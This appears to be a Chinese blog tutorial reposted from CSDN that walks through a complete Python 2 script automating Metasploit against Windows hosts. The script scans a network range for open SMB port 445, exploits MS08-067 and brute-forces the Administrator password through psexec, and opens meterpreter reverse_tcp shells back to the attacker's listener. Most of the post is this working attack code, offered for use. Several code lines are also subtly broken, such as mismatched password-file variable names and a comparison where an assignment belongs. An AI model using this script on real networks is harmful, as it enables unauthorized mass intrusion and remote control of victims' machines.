Python脚本与Metasploit交互攻击

向右看齐 2022-04-22 15:04 233阅读 0赞

Metasploit是一款强大的漏洞扫描和利用工具，编写Python脚本与Metasploit进行交互，可以自动化的扫描和利用漏洞。

相关文章：Metasploit框架的使用

在脚本中，我们首选需要利用 nmap 模块扫描目标主机是否开放了445端口，我们写了一个 findTarget() 函数，来扫描给定ip或者给定网段中开放了目标端口的主机，返回开放了445端口的主机列表。445端口是作为SMB文件共享协议的端口，在这个端口上，经常爆发出各种高危的漏洞。 相关文章：文件共享协议之139/445端口

def findTarget(Hosts):              \#扫描网段范围内开放445端口的主机  
    nmScan=nmap.PortScanner()  
    nmScan.scan(Hosts,'445')  
    targets=\[\]  
    for t in nmScan.all\_hosts():  
        if nmScan\[t\].has\_tcp(445):  \#如果445端口提供了协议  
            state=nmScan\[t\]\['tcp'\]\[445\]\['state'\]  \#查看445端口的状态  
            if state=='open':  
                print '\[+\]Found Target Host:'+t  
                targets.append(t)  
                  
    return targets         \#返回开放445端口的主机列表  
Metasploit提供了一个被称为Meterpreter的高级动态载荷，它是一种后渗透工具。当渗透进目标主机后，Meterpreter会主动连接目标主机，并提供大量 分析和控制主机的参数。我们写了setupHandler()函数，使用 exploit/multi/handler监听数据，我们设置payload为 windows/x64/meterpreter/reverse\_tcp 。我们还需要设置一个全局变量DisablePayloadHandler，其作用是：我们已经新建了一个监听器，以后所有的主机都不必重复新建监听器。相关文章：Meterpreter之exploit/multi/handler木马

def setupHandler(configFile,lhost,lport):               \#监听被攻击的主机  
    configFile.write('use exploit/multi/handler\\n')     \#使用  
    configFile.write('set PAYLOAD windows/meterpreter/reverse\_tcp \\n')  \#设定payload载荷  
    configFile.write('set LPORT '+str(lport)+'\\n')      \#设置监听的端口  
    configFile.write('set LHOST '+lhost+'\\n')           \#设置监听的主机，也就是我们的主机  
    configFile.write('set DisablePayloadHandler 1\\n')  \#不重新监听  
    configFile.write('exploit  -j  -z\\n')              \#监听  j选项是将所有连接的会话保持在后台 -z不与任务进行即时交换  
当脚本能够在目标主机上执行漏洞利用代码时，配置函数将向Metasploit  rc 脚本中写入用于生成漏洞利用代码的目标主机、本地地址和端口。该函数还将把使用哪个漏洞利用代码的指令也写入rc脚本文件中，这里我们使用 MS\_08067\_netapi漏洞。此外，该函数还需要设置Payload、Lport。最后，该脚本发送一条指令在同一个任务(job)的上下文环境中( -j )，不与任务进行即时交互的条件下 ( -z ) 利用对目标计算机上的漏洞

def confickerExploit(configFile,target,lhost,lport):       \#漏洞利用  
    configFile.write('use exploit/windows/smb/ms08\_067\_netapi\\n')  \#漏洞利用代码  
    configFile.write('set PAYLOAD windows/meterpreter/reverse\_tcp\\n')  
    configFile.write('set RHOST '+str(target)+'\\n')              \#设定参数  
    configFile.write('set LPORT '+str(lport)+'\\n')  
    configFile.write('set LHOST '+lhost+'\\n')  
    configFile.write('exploit \\n')  
尽管如此我们已经可以成功的在被黑的主机上运行漏洞利用代码，但一旦目标主机安装了最新的安全补丁便可以阻止该代码被执行，因此我们的脚本还需要另一种攻击方式，如暴力破解SMB用户名和密码，以此获取在目标主机上远程执行一个进程的权限。输入smbBrute() 函数的参数有：Metasploit 脚本文件、目标主机、包含密码列表的另一个文件、本地地址、端口。用户名默认为windows管理员Administrator，打开密码列表文件，对于每一个密码，都会生成一个用来远程执行进程的Metasploit脚本，如果密码正确则远程执行进程的代码就会运行一个shell到攻击者本地地址对应的端口。

def smbBrute(configFile,target,passwdFile,lhost,lport):  
    username='Administrator'  
    pF=open(passwordFile,'r')  
    for password in pF.readlines():  
        password=password.strip('\\n')  
        configFile.write('use exploit/windows/smb/psexec\\n')  
        configFile.write('set SMBUser '+str(username)+'\\n')  
        configFile.write('set SMBPass '+str(password)+'\\n')  
        configFile.write('set RHOST '+str(target)+'\\n')  
        configFile.write('set PAYLOAD windows/meterpreter/reverse\_tcp\\n')  
        configFile.write('set LPORT '+str(lport)+'\\n')  
        configFile.write('set LHOST '+lhost+'\\n')  
        configFile.write('exploit -j -z\\n')  
最后，对上面所有的代码进行整合。

\# -\*- coding: utf-8 -\*-  
"""  
Created on Sun Nov  4 16:11:33 2018  
@author: 小谢  
"""  
import os  
import optparse  
import sys  
import nmap  
def findTarget(Hosts):              \#扫描网段范围内开放445端口的主机  
    nmScan=nmap.PortScanner()  
    nmScan.scan(Hosts,'445')  
    targets=\[\]  
    for t in nmScan.all\_hosts():  
        if nmScan\[t\].has\_tcp(445):  \#如果445端口提供了协议  
            state=nmScan\[t\]\['tcp'\]\[445\]\['state'\]  \#查看445端口的状态  
            if state=='open':  
                print '\[+\]Found Target Host:'+t  
                targets.append(t)   
    return targets         \#返回开放445端口的主机列表  
def setupHandler(configFile,lhost,lport):               \#监听被攻击的主机  
    configFile.write('use exploit/multi/handler\\n')     \#使用  
    configFile.write('set PAYLOAD windows/meterpreter/reverse\_tcp \\n')  \#设定payload载荷  
    configFile.write('set LPORT '+str(lport)+'\\n')      \#设置监听的端口  
    configFile.write('set LHOST '+lhost+'\\n')           \#设置监听的主机，也就是我们的主机  
    configFile.write('set DisablePayloadHandler 1\\n')  \#不重新监听  
    configFile.write('exploit  -j  -z\\n')                 \#监听  j选项是将所有连接的会话保持在后台 -z不与任务进行即时交换  
      
def confickerExploit(configFile,target,lhost,lport):       \#漏洞利用  
    configFile.write('use exploit/windows/smb/ms08\_067\_netapi\\n')  \#漏洞利用代码  
    configFile.write('set PAYLOAD windows/meterpreter/reverse\_tcp\\n')  
    configFile.write('set RHOST '+str(target)+'\\n')              \#设定参数  
    configFile.write('set LPORT '+str(lport)+'\\n')  
    configFile.write('set LHOST '+lhost+'\\n')  
    configFile.write('exploit \\n')  
def smbBrute(configFile,target,passwdFile,lhost,lport):          \#暴力破解SMB口令  
    username='Administrator'  
    pF=open(passwordFile,'r')  
    for password in pF.readlines():  
        password=password.strip('\\n')  
        configFile.write('use exploit/windows/smb/psexec\\n')  
        configFile.write('set SMBUser '+str(username)+'\\n')  
        configFile.write('set SMBPass '+str(password)+'\\n')  
        configFile.write('set RHOST '+str(target)+'\\n')  
        configFile.write('set PAYLOAD windows/meterpreter/reverse\_tcp\\n')  
        configFile.write('set LPORT '+str(lport)+'\\n')  
        configFile.write('set LHOST '+lhost+'\\n')  
        configFile.write('exploit -j -z\\n')  
def main():  
    configFile=open('meta.rc','w')  \#以写入方式打开配置文件  
    usage='\[-\]Usage %prog -H <RHOSTS> -l/-L <LHOST> \[-p/-P <LPORT> -F/-f <password File>\]'  
    parser=optparse.OptionParser(usage)  
    parser.add\_option('-H',dest='target',type='string',help='target host')  
    parser.add\_option('-p','-P',dest='lport',type='string',help='listen port')  
    parser.add\_option('-l','-L',dest='lhost',type='string',help='listen address')  
    parser.add\_option('-F','-f',dest='passwdFile',type='string',help='password file')  
    (options,args)=parser.parse\_args()  
    passwdFile=options.passwdFile  
    target=options.target  
    lport=options.lport  
    lhost=options.lhost  
    if (target==None)|(lhost==None):  
        print parser.usage  
        exit(0)  
    if options.lport==None:  
        lport=='2333'  
    targets=findTarget(options.target)           \#寻找目标  
    setupHandler(configFile,lhost,lport)         \#设置配置文件  
    for target in targets:                       \#逐个攻击  
        confickerExploit(configFile,target,lhost,lport)  
        if passwdFile!=None:  
            smbBrute(configFile,target,passwdFile,lhost,lport)  
        configFile.close()  
        os.system('msfconsole -r meta.rc')  \#启动metasploit并读取配置文件  
if \_\_name\_\_=='\_\_main\_\_':  
    main()  
当我们运行脚本，指定好参数后，脚本就会扫描目标主机中开放了445端口的主机，将其加入到 targets 列表中，然后将要攻击的代码写入 meta.rc 配置文件中，最后启动MSF读取配置文件进行攻击！

[https://blog.csdn.net/qq\_36119192/article/details/83857320][https_blog.csdn.net_qq_36119192_article_details_83857320]

[https_blog.csdn.net_qq_36119192_article_details_83857320]: https://blog.csdn.net/qq_36119192/article/details/83857320